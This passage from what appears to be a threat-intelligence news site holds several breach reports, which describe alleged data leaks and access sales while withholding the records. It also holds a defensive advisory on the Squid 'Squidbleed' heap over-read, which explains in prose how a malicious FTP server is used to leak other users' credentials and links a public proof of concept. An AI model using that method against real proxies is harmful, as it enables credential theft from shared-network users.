full payment-card numbers appear in the samples, which limits direct account or card takeover, but the transaction context still supports targeted social engineering and fraud. No customer records, names, company details, addresses, emails, phone numbers, or download links are reproduced here. The scope and authenticity are unverified. ### iStatus Unverified Sample rows and a download behind a points paywall were posted to a forum; the sample records, customer identities, and download links are **not** reproduced here. The actor describes the data as a full leak of the company's database. The claim has **not been independently confirmed** and Flawireless / Techy Extra has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Alleged GOV.CO Colombia Leak Claims 4.3 Million Records, but the Posted Sample Is German Taxpayer Data URL: https://darkwebinformer.com/alleged-gov-co-colombia-leak-claims-4-3-million-records-but-the-posted-sample-is-german-taxpayer-data/ Last updated: 2026-06-26T16:25:58.000Z Breach Report ![Colombia flag](https://flagcdn.com/w40/co.png)Colombia (claim) ![Germany flag](https://flagcdn.com/w40/de.png)Germany (data) Mismatch ## Alleged GOV.CO Colombia Leak Claims 4.3 Million Records, but the Posted Sample Is German Taxpayer Data A threat actor using the alias **NormalLeVrai** has posted a “comeback” teaser headlined as a leak of **GOV.CO**, the official digital platform of the Colombian government, claiming **4,300,002 records**. However, the post's contents do not match that label: the sample shown is **German**, consisting of what appear to be German taxpayer records (tax IDs, full names, dates of birth, postal addresses, and phone numbers), and the download is titled to indicate roughly 4.2 million German tax records. Separately, the actor claims to have accessed the email inboxes of a **Colombian state hospital** and includes an Outlook screenshot. The mismatch between the Colombian GOV.CO headline and the German data shown, together with the teaser framing, makes the listing's true target and authenticity **unclear and unverified**. Severity HIGH Data4.3M claimed SampleGerman PII CountryCO / DE (unclear) ActorNormalLeVrai ### ▣Post details Claimed targetGOV.CO (Colombia digital platform) Sample dataGerman taxpayer records Inbox claimColombian state hospital email Claimed volume4,300,002 (headline); \~4.2M (file) CountriesColombia (claim) / Germany (data) FormatCSV download ObservedJun 25, 2026 ActorNormalLeVrai ### !Shown / claimed - \~4.3M records (headline claim) - German tax IDs (sample) - Full names & dates of birth - German postal addresses - Phone numbers - Claimed hospital inbox access - CSV download (German tax file) - Target / authenticity disputed ### ◱Screenshot [ ![GOV.CO Germany mismatched leak post Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/87632157489129374862359678987623596871.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/87632157489129374862359678987623596871.png) ### ⚠Potential impact The challenge in assessing this post is its internal inconsistency, which is itself the key finding. If the German data is genuine, it would be a large and sensitive exposure: German tax identification numbers are permanent identifiers, and pairing them with names, dates of birth, home addresses, and phone numbers for millions of people would enable identity theft and fraud at scale. Separately, if the actor truly accessed a Colombian state hospital's email inboxes, that would be a serious intrusion exposing healthcare correspondence and patient identifiers. However, the headline claim of a 4.3 million record Colombian GOV.CO breach is **not supported by the evidence shown**, which is German rather than Colombian. Mislabeled, recycled, or exaggerated “comeback” posts are common, so the true target, scale, and authenticity should be treated as unverified. No sample records, identifiers, inbox contents, download links, or actor contact details are reproduced here. ### iStatus Unverified / disputed The post mixes a Colombian GOV.CO headline with a German taxpayer-data sample and a claimed Colombian hospital inbox screenshot, and is framed as a “comeback” teaser. The sample records, the inbox contents and patient identifiers, the download link, and the actor's contact channels are **not** reproduced here. Given the contradictions, the listing's real target and authenticity are unclear, and neither GOV.CO nor the named hospital has publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Durango State Education Department Allegedly Breached, Exposing Records of Thousands of Primary School Children URL: https://darkwebinformer.com/durango-state-education-department-allegedly-breached-exposing-records-of-thousands-of-primary-school-children/ Last updated: 2026-06-26T16:11:35.000Z Breach Report ![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Education Involves Minors ## Durango State Education Department Allegedly Breached, Exposing Records of Thousands of Primary School Children A threat actor using the alias **D3spair157** (operating as “Sociedad Privada 157”) has posted what they describe as a data leak from the **Secretaría de Educación del Estado de Durango (SEED)**, Mexico's Durango state education department, reportedly obtained using administrator credentials to its student-management portal. The leak is said to contain **3,487 records covering children aged 6 to 12** across 19 primary schools, along with their parents and guardians. Per the post, the exposed fields include each child's **CURP (Mexican national ID)**, full name, sex, date of birth, grade, home address, and sensitive status flags such as **disability, special educational needs, and indigenous status**, together with both parents' full names, home addresses, and phone numbers. Because this dataset concerns identifiable young children and their home locations, it is **exceptionally sensitive**. The dataset's authenticity and scope are **unverified**. Severity CRITICAL Data3,487 records AffectedAges 6 to 12 Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico ActorD3spair157 ### ▣Post details TargetSEED Durango (state education dept) Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico (Durango) SectorGovernment / Education ClaimStudent-portal database leaked Records3,487 children + parents Schools19 primary schools VectorStolen administrator credentials ActorD3spair157 (Sociedad Privada 157) ### !Allegedly included - 3,487 child records (claimed) - Children ages 6 to 12 - CURP (national ID) & full names - Dates of birth & sex - Home addresses - Disability & special-needs flags - Parents' / guardians' names & contacts - 19 primary schools' data ### ◱Screenshot [ ![SEED Durango Mexico alleged school data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/237986598761249762359876523987987123.png) Screenshot 1 Redacted: minors' data ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/237986598761249762359876523987987123.png) ### ⚠Potential impact This is a critical child-safety incident. The dataset reportedly links thousands of named children aged 6 to 12 to their dates of birth, national ID numbers (CURP), and **home addresses**, and adds highly sensitive flags about disability, special educational needs, and indigenous status, alongside their parents' names, addresses, and phone numbers. Exposing identifiable young children together with their home locations and school enrollment creates a **direct physical-safety risk**, including potential for stalking, targeting, and child endangerment, beyond the usual harms of identity theft and fraud against the children and their families. National ID numbers and dates of birth are permanent and cannot be changed. Because the data was reportedly offered for free download, the exposure may already be spreading. No child or parent records, names, IDs, addresses, sample data, download links, or attacker contact channels are reproduced or linked here. ### iStatus Unverified The actor claims the data was taken using administrator credentials to the state education portal and provides a download plus contact channels; none of these, and none of the children's or parents' personal data, are reproduced or linked here. This listing comes from the **same group behind other recent Mexican government-portal leaks**. The claim has **not been independently confirmed** and SEED Durango has not publicly addressed it. [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Leroy Merlin Spain Customer Database of Nearly 55,000 Records Allegedly Leaked URL: https://darkwebinformer.com/leroy-merlin-spain-customer-database-of-nearly-55-000-records-allegedly-leaked/ Last updated: 2026-06-25T20:34:05.000Z Breach Report ![Spain flag](https://flagcdn.com/w40/es.png)Spain Retail ## Leroy Merlin Spain Customer Database of Nearly 55,000 Records Allegedly Leaked A threat actor using the alias **Saturne** has posted what they describe as the **customer database of leroymerlin.es**, the official Spanish e-commerce site of Leroy Merlin, a major home-improvement and DIY retail chain. The leak reportedly contains **54,723 records** dated June 2026 and is being shared for free. Per the post, each record includes the customer's name and surname, email address, phone number, **Spanish national ID (DNI)** document type and number, full postal address (street, complement, postal code, city, and province), a Firebase user ID, marketing-consent flags, and store-card and billing references. The dataset's authenticity and scope are **unverified**. Severity MEDIUM Data54,723 records PriceFree leak Country![Spain flag](https://flagcdn.com/w40/es.png)Spain ActorSaturne ### ▣Post details TargetLeroymerlin.es (Leroy Merlin Spain) Country![Spain flag](https://flagcdn.com/w40/es.png)Spain SectorRetail / E-commerce ClaimCustomer database leaked (54,723 records) DataNames, emails, phones, DNI, addresses FreshnessJun 2026 ObservedJun 25, 2026 ActorSaturne ### !Allegedly included - 54,723 records (claimed) - Names & surnames - Email addresses - Phone numbers - DNI (Spanish national ID) - Full postal addresses - Marketing-consent flags - Store-card & billing references ### ◱Screenshot [ ![Leroy Merlin Spain alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/29783659786234987623498763298723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/29783659786234987623498763298723.png) ### ⚠Potential impact This breach pairs standard contact data with stronger identifiers: alongside names, emails, and phone numbers, the records reportedly include each customer's **Spanish national ID (DNI)** and full home address. The DNI is a core identity document in Spain used across banking, government, and contracts, so its exposure together with a verified home address and contact details creates a meaningful risk of identity theft, fraudulent account opening, and convincing targeted phishing or impersonation referencing real address and purchase details. No passwords or full payment-card numbers appear in the sample, which limits direct account or card compromise, but the national-ID-plus-address combination keeps this above a routine retail email leak. Because the data concerns EU residents, the exposed identifiers and contact details also carry GDPR implications. No customer records, names, IDs, addresses, or download links are reproduced here. The scope and authenticity are unverified. ### iStatus Unverified A sample record and a download were posted to a forum behind a reply-gate; the sample (which contains a customer's personal data), the customers' identifying details, and the actor's contact handle are **not** reproduced here. The actor describes the data as a free leak of the retailer's database. The claim has **not been independently confirmed** and Leroy Merlin has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Alleged Full Texas Parks and Wildlife Database Offered for Sale After Confirmed Breach of 3.1 Million Records URL: https://darkwebinformer.com/alleged-full-texas-parks-and-wildlife-database-offered-for-sale-after-confirmed-breach-of-3-1-million-records/ Last updated: 2026-06-25T16:14:18.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Government Access for Sale ## Alleged Full Texas Parks and Wildlife Database Offered for Sale After Confirmed Breach of 3.1 Million Records A threat actor using the alias **Shadowreaper** is advertising the sale of what they claim is a complete database exfiltration from the **Texas Parks and Wildlife Department (TPWD)**, listing around 3.13 million records at prices up to about **$8,550** for the full set. The listing claims the data includes roughly 2.1 million “fullz” (name, date of birth, and Social Security number with address) and about 150,000 payment cards with CVV. **These claims go beyond, and partly contradict, the agency's official disclosure.** TPWD has confirmed a real breach affecting **3,087,721 people** via a third-party license vendor, but states the exposed data was limited to driver's license information, passport numbers, emails, phone numbers, and addresses, and that **Social Security numbers, dates of birth, and credit-card data were not obtained**. The listing's financial and SSN claims are **unverified and disputed by the official findings**. Severity HIGH Affected3.09M people Listing priceUp to $8,550 Country![United States flag](https://flagcdn.com/w40/us.png)USA ActorShadowreaper ### ▣Post details TargetTexas Parks & Wildlife Dept (via license vendor) Country![United States flag](https://flagcdn.com/w40/us.png)United States (Texas) SectorGovernment / Public Sector ListingFull DB dump for sale (PII + financials) Confirmed3,087,721 affected (DL, passport, contact) DisputedSSN, DOB, cards with CVV ObservedJun 23, 2026 (breach disclosed Jun 18) ActorShadowreaper ### !Confirmed vs claimed - \~3.09M people affectedConfirmed - Driver's license infoConfirmed - Passport numbersConfirmed - Email, phone, addressConfirmed - SSN + DOB “fullz”Claimed - \~150K cards with CVVClaimed - Donor & transaction dataClaimed - License / permit detailsClaimed ### ◱Screenshot(s) [ ![Texas Parks Wildlife alleged sale listing Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/239087298576092834987256987235798.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/239087298576092834987256987235798.png) [ ![Texas Parks Wildlife alleged sale listing Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/239087298576092834987256987235799.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/239087298576092834987256987235799.png) ### ⚠Potential impact The confirmed breach is serious on its own: driver's license and passport numbers, unlike passwords, cannot be reset and are highly valuable for identity theft, synthetic-identity fraud, and targeted phishing, and they were exposed alongside contact details and home addresses for over three million people. Affected individuals should enroll in the free credit monitoring TPWD is offering through Kroll (enrollment deadline September 14, 2026) and place credit freezes with the major bureaus. Separately, this seller's claims that the dataset also contains Social Security numbers, dates of birth, and full payment cards with CVV would, if true, escalate the situation to a worst-case financial-fraud scenario, but those specific claims **contradict TPWD's official statement** that such data was not taken. Inflated or fabricated “fuller” listings are a common opportunistic response to a widely publicized breach, so the financial and SSN claims should be treated with skepticism pending evidence. No records, identifiers, payment instructions, or seller contact details are reproduced here. ### iStatus Breach confirmed, listing disputed TPWD has **publicly confirmed** a breach of this scale through a third-party license vendor, with public disclosure on June 18, 2026\. However, this sale listing and its claim to include SSNs and payment-card data are **unverified and exceed what the agency says was obtained**; the seller's financial claims may be exaggerated or fraudulent. The sample/validation details, the purchase pathway, and the seller's contact handle are not reproduced here. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Around 347,000 Ecuadorian Citizens' Facial and Biometric Records Allegedly Offered for Sale URL: https://darkwebinformer.com/around-347-000-ecuadorian-citizens-facial-and-biometric-records-allegedly-offered-for-sale/ Last updated: 2026-06-25T15:59:26.000Z Breach Report ![Ecuador flag](https://flagcdn.com/w40/ec.png)Ecuador Biometric Involves Minors ## Around 347,000 Ecuadorian Citizens' Facial and Biometric Records Allegedly Offered for Sale A threat actor using the alias **Albertcamus** is advertising what they describe as a database of facial images and identity records for **347,178 Ecuadorian citizens**. Per the post, the dataset pairs hundreds of thousands of facial photographs (JPG) with a metadata file containing each person's **national ID number (cédula)**, full name, nationality, gender, date of birth, birthplace, civil status, profession, and a **dactilar (fingerprint) code**. The sample records shared by the seller **include minors**, indicating the database holds biometric and identity data of children as well as adults. Because this is **biometric data, it is permanent and cannot be changed once exposed**. The dataset's authenticity and scope are **unverified**. Severity CRITICAL Data347,178 records TypeFacial + biometric Country![Ecuador flag](https://flagcdn.com/w40/ec.png)Ecuador ActorAlbertcamus ### ▣Post details TargetEcuadorian citizen facial / identity database Country![Ecuador flag](https://flagcdn.com/w40/ec.png)Ecuador SectorGovernment / Biometric ID Claim347,178 facial images + metadata for sale DataFacial images, national IDs, biometrics SensitiveIncludes minors' records ObservedJun 23, 2026 ActorAlbertcamus ### !Allegedly included - 347,178 facial images (claimed) - National ID numbers (cédula) - Full names & nationality - Dates of birth & birthplace - Gender & civil status - Profession - Dactilar (fingerprint) codes - Records of minors included ### ◱Screenshot [ ![Ecuador alleged citizen database listing Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/93287287958279365987263598766987236.png) Screenshot 1 Redacted: minors' data ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/93287287958279365987263598766987236.png) ### ⚠Potential impact This is a critical exposure because it concerns **biometric data, which is permanent and irrevocable**: unlike a password, a person's face and fingerprints cannot be reset once leaked. The dataset reportedly combines facial photographs with national ID numbers, full names, dates of birth, birthplaces, and fingerprint codes, forming a complete identity profile for each individual. Such data enables identity theft, biometric spoofing and authentication bypass, large-scale impersonation, and persistent surveillance or tracking. The exposure is especially grave because the seller's own samples include **minors**, meaning children's faces, identities, and biometrics are part of the dataset, placing a vulnerable group at heightened and long-lasting risk. No records, names, ID numbers, images, or contact details from the listing are reproduced here. The authenticity and scope are unverified. ### iStatus Unverified The seller offers samples via a messaging channel. The sample records (which include minors' personal data), the citizens' identifying details, the facial images, and the seller's contact handle are **not** reproduced or linked here. The claim has **not been independently confirmed** and Ecuadorian authorities have not publicly addressed it. If accurate, this would warrant urgent notification of Ecuador's data-protection authority and civil registry. [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Taxpayer Database From Mexico's Coahuila State Government Allegedly Leaked URL: https://darkwebinformer.com/taxpayer-database-from-mexicos-coahuila-state-government-allegedly-leaked/ Last updated: 2026-06-25T16:14:48.000Z Breach Report ![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Government ## Taxpayer Database From Mexico's Coahuila State Government Allegedly Leaked Threat actors using the aliases **M1sery157** and **D3spair157** (operating as “Sociedad privada 157”) have posted what they describe as a database scraped from a **Coahuila state government portal** in Mexico. The actors claim they exploited long-standing web vulnerabilities in the portal to extract taxpayer (*contribuyente*) records, and that the leak contains **1,396 records** in CSV format. Per the post, each record includes the taxpayer's name, **RFC (Mexican federal tax ID)**, full home address (street, cross streets, neighborhood, and postal code), phone number, and detailed workplace information including the employer's name, activity, address, and phone. The dataset's authenticity and scope are **unverified**. Severity MEDIUM Data1,396 records AccessFree leak Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico ActorM1sery157 ### ▣Post details TargetCoahuila state government portal (Mexico) Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico SectorGovernment / Public Sector ClaimTaxpayer database scraped & leaked DataNames, RFC, home & work addresses, phones VectorExploited portal web vulnerabilities ObservedJun 23, 2026 ActorM1sery157 x D3spair157 ### !Allegedly included - 1,396 records (claimed) - Taxpayer names - RFC (Mexican tax ID) - Full home addresses - Neighborhood & postal code - Phone numbers - Workplace name & activity - Workplace address & phone ### ◱Screenshot [ ![Coahuila Mexico alleged government data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/2978359728364978623598729876569872365.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/2978359728364978623598729876569872365.png) ### ⚠Potential impact Although the dataset is small, the per-record content is sensitive: it ties named taxpayers to their **RFC** (a Mexican federal tax identifier used across financial and government services), full **home and workplace addresses**, and phone numbers. This combination supports identity theft and tax-related fraud, targeted phishing and impersonation, and, because it pairs names with both home and work locations, physical-targeting risks such as extortion, which are a particular concern in Mexico. The data reportedly originates from a government portal exposed through unpatched web vulnerabilities, pointing to a wider security gap. No taxpayer records, names, RFCs, addresses, or download links are reproduced here. The scope and authenticity are unverified. ### iStatus Unverified Sample field headers, a CSV download, and a Telegram channel were posted to a forum; the sample, download links, and the actors' channel are not reproduced here. The actors claim the data was obtained by scraping a Coahuila government portal via web vulnerabilities. The claim has **not been independently confirmed** and Coahuila authorities have not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Squidbleed: A 29-Year-Old Heap Over-Read Leaks Cleartext HTTP in Squid (CVE-2026-47729) URL: https://darkwebinformer.com/squidbleed-a-29-year-old-heap-over-read-leaks-cleartext-http-in-squid-cve-2026-47729/ Last updated: 2026-06-24T16:27:30.000Z Info Disclosure CVSS Pending Impact Credential Leak Exploit Public PoC # Squidbleed: A 29-Year-Old Heap Over-Read Leaks Cleartext HTTP in Squid (CVE-2026-47729) Squid Web Proxy • CWE-125 Out-of-Bounds Read • Disclosed June 2026 ## Vulnerability Overview [CVE-2026-47729](https://nvd.nist.gov/vuln/detail/CVE-2026-47729), nicknamed **Squidbleed**, is a heap buffer over-read in the FTP gateway of the **Squid web proxy**. The bug traces back to a commit from January 1997 and survived nearly three decades of releases, code reviews, and audits. It lets an attacker who is already an authorized user of a shared proxy leak fragments of other users' cleartext HTTP requests, including credentials, cookies, and session tokens, by coaxing the proxy into reading memory it should never return. The flaw was disclosed by researchers at [Calif.io](https://blog.calif.io/p/squidbleed-cve-2026-47729) in June 2026\. At the time of writing it has no official CVSS score assigned, but a cross-tenant credential leak on infrastructure that sits between many users and the internet should be treated as serious regardless of the pending number. CVE ID CVE-2026-47729 CVSS Score Pending Weakness CWE-125 Affected Product Squid Proxy Affected Config FTP Enabled (default) Attacker Position Trusted Proxy Client Exploit Status Public PoC Fixed In Squid 7.7 (verify) Bottom Line If you run a multi-user Squid proxy with FTP enabled, the cleanest immediate action is to disable FTP. Then patch to a build that actually contains the fix and verify the guard in `FtpGateway.cc`, because the version number alone has proven unreliable here. ## Why This Matters Squid is one of the most widely deployed web proxies, common in schools, businesses, public Wi-Fi, and embedded appliances, precisely the shared, multi-user environments where Squidbleed becomes dangerous. In those settings the attacker is not some distant internet host; they are just another authorized user of the same proxy, which is exactly the trust model Squid is built around. A bug that lets one tenant read another tenant's in-flight requests turns a piece of shared plumbing into a credential-harvesting channel. The leak is bounded but meaningful: normal HTTPS rides an opaque `CONNECT` tunnel that Squid never sees inside, so it is not exposed, but cleartext HTTP is, as is any traffic in TLS-terminating setups where Squid decrypts and inspects. ## Technical Analysis The root cause lives in Squid's FTP directory-listing parser. When Squid fetches an FTP directory listing, the parser processes the server's response, and a missing `NUL`\-terminator check before the vulnerable `strchr` calls means a crafted or truncated listing can drive the read past the end of the intended buffer. That out-of-bounds read pulls in adjacent heap memory, which on a busy proxy can contain other users' in-flight HTTP request data, including `Authorization` headers and cookies. The leaked bytes are then surfaced back to the attacker in the rendered response. Turning that into an exploit is straightforward. As demonstrated by [public proof-of-concept code](https://github.com/0xBlackash/CVE-2026-47729), the attacker stands up a malicious FTP server that returns a truncated directory listing, then repeatedly forces Squid to connect to it using FTP URLs. Each fetch triggers the over-read and returns a slice of adjacent memory, and the attacker reassembles credentials and tokens from the leaked fragments across many requests. The preconditions are mild by design: the proxy must be able to reach an attacker-controlled FTP server on port 21, and both FTP handling and that port are enabled in default Squid configurations. The discovery itself is notable. Per the researchers' write-up, Squidbleed was surfaced by Calif.io with the assistance of an AI model, part of a broader 2026 trend of AI-assisted vulnerability research turning up long-dormant memory-safety bugs in mature, heavily audited codebases. A one-line parser oversight hiding in plain sight since 1997 is a fitting example of the class. ## Exploitation Status Proof-of-concept exploit code is public, and it reliably reproduces credential and token extraction in a lab. As of late June 2026, there were no confirmed reports of in-the-wild exploitation, but the low barrier (an authorized proxy user plus a hostile FTP server) and the value of the loot (live credentials and sessions) make this an attractive technique against shared proxy infrastructure. The exposure is strongest in environments where many users share one Squid instance and where Squid handles or decrypts cleartext HTTP. ## Don't Confuse the Fix Versions The remediation story for Squidbleed has been genuinely confusing, and getting it wrong leaves you exposed. The one-line fix (the missing `NUL`\-terminator check) was merged to the development branch in April 2026 and into the v7 branch in May. Squid maintainer Amos Jeffries initially indicated the fix shipped in **Squid 7.6**, then corrected that to **7.7**; separately, Debian's Salvatore Bonaccorso observed that the referenced commit appears to be present in 7.6\. The safe conclusion is to stop trusting the version label alone and confirm the guard is actually in your build's `FtpGateway.cc`, especially since distributions ship their own packages (Debian, for instance, has shipped Squid 5.7). One more trap: Squid 7.6 did land a real security fix, but for a *different* bug, [CVE-2026-50012](https://thecybersecguru.com/news/squidbleed-cve-2026-47729-squid-proxy-heap-overread/), an unrelated heap-based buffer overflow in `cache_digest` reply handling. If you upgraded to 7.6 assuming you also closed Squidbleed, you may not have. ## Mitigation & Remediation Priority order, drawn from the [Calif.io disclosure](https://blog.calif.io/p/squidbleed-cve-2026-47729) and follow-up reporting: 1. **Disable FTP.** Unless you have a specific, unusual need for it, turn off FTP handling in Squid. The researchers recommend this as the primary preventive measure, and it removes the attack vector outright. 2. **Patch and verify the guard.** Move to a build that contains the FTP gateway fix (Squid 7.7 per the maintainer's correction) and confirm the `NUL`\-terminator check is present in `FtpGateway.cc` rather than trusting the version number, accounting for distro backports. 3. **Block outbound FTP from the proxy.** Restrict the proxy's egress so it cannot reach arbitrary external FTP servers on port 21, which denies the attacker the malicious-listing step. 4. **Rotate exposed secrets.** In multi-user or TLS-intercepting deployments, treat credentials and session tokens that traversed the proxy as potentially leaked and rotate where warranted. 5. **Monitor.** Watch proxy logs for repeated FTP directory-listing fetches to unusual or attacker-like external FTP servers. ## The Bigger Picture Squidbleed is a reminder that age and audit history are not safety. A trivial parser oversight persisted for 29 years in a security-relevant code path inside software whose entire job is to sit in the middle of other people's traffic. It also previews a shift already underway: AI-assisted review is now reaching into decades-old C and C++ and surfacing the quiet memory-safety bugs that human audits repeatedly walked past. For defenders, the practical lessons are old ones made urgent again: minimize attack surface (turn off protocols you do not use, like FTP), do not assume shared infrastructure isolates its tenants, and verify that a patch is truly present rather than inferring it from a version string. ## References - [Calif.io - Squidbleed (CVE-2026-47729) Disclosure](https://blog.calif.io/p/squidbleed-cve-2026-47729) - [NVD - CVE-2026-47729](https://nvd.nist.gov/vuln/detail/CVE-2026-47729) - [The CyberSec Guru - Inside Squid's 29-Year-Old Bug](https://thecybersecguru.com/news/squidbleed-cve-2026-47729-squid-proxy-heap-overread/) - [IT-Connect - Squidbleed Leaks User Credentials](https://www.it-connect.tech/squidbleed-29-year-old-squid-proxy-flaw-leaks-user-credentials/) - [QPulse - Squidbleed Exposes Cleartext HTTP Traffic](https://qpulse.quasarcybertech.com/news/4240/squidbleed-heap-over-read-vulnerability-cve-2026-47729-exposes-cleartext-http-traffic) - [SUSE - CVE-2026-47729](https://www.suse.com/security/cve/CVE-2026-47729.html) - [Public Proof-of-Concept (0xBlackash)](https://github.com/0xBlackash/CVE-2026-47729) ### Illicit Access to France's Vehicle Registration System SIV Allegedly Offered For Sale URL: https://darkwebinformer.com/illicit-access-to-frances-vehicle-registration-system-siv-allegedly-offered-for-sale/ Last updated: 2026-06-23T15:57:23.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Government Access for Sale ## Illicit Access to France's Vehicle Registration System SIV Allegedly Offered For Sale A threat actor using the alias **shabat** is advertising the sale of **unauthorized access to France's SIV** (Système d'Immatriculation des Véhicules), the country's official national vehicle-registration system. The listing offers “Acces SIV” for around **$2,000** and claims the access can be used to carry out a range of vehicle-registration procedures, including ownership transfers, sale and purchase declarations, duplicate registration certificates (*carte grise*), address changes, and vehicle imports. If genuine, such access would enable fraudulent manipulation of official vehicle records. The claim and the nature of the access are **unverified**. Severity HIGH TypeSystem access Price$2,000 Country![France flag](https://flagcdn.com/w40/fr.png)France Actorshabat ### ▣Post details TargetSIV (Système d'Immatriculation des Véhicules) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorGovernment / Automotive ClaimUnauthorized SIV access for sale CapabilityVehicle-registration procedures (fraud risk) Price$2,000 (access) ObservedJun 23, 2026 Actorshabat ### !Allegedly offered - Unauthorized SIV access (claimed) - Vehicle ownership transfers - Sale & purchase declarations - Duplicate registration certificates - Vehicle address changes - Vehicle imports - Registration card reissuance - Priced around $2,000 ### ◱Screenshot [ ![France SIV alleged access-for-sale Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/82378654987329876481792389765213.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/82378654987329876481792389765213.png) ### ⚠Potential impact This is a high-severity listing because it offers unauthorized access to an official government vehicle-registration system rather than a static dataset. If genuine, such access would allow an attacker to fraudulently alter vehicle records: transferring ownership, registering imported or stolen vehicles, issuing duplicate or co-titled registration certificates (*cartes grises*), and changing registered addresses. This kind of capability is commonly sought for vehicle laundering (giving stolen cars a clean registration history), document fraud, and resale scams, and it undermines the integrity of official records that insurers, police, and buyers rely on. No access credentials, methods, proofs, or seller contact details are reproduced here. The legitimacy of the access is unverified. ### iStatus Unverified The seller posted a price, a list of offered procedures, and “proofs” plus contact details. The claim has **not been independently confirmed**, and there is no public confirmation that the SIV has been compromised. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Around 30,700 Records Allegedly Leaked From France's Hospital Federation FHF URL: https://darkwebinformer.com/around-30-700-records-allegedly-leaked-from-frances-hospital-federation-fhf/ Last updated: 2026-06-23T15:44:56.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Healthcare ## Around 30,700 Records Allegedly Leaked From France's Hospital Federation FHF A threat actor using the alias **Saturne** has posted what they describe as the **database of FHF.fr**, the official website of the **Fédération 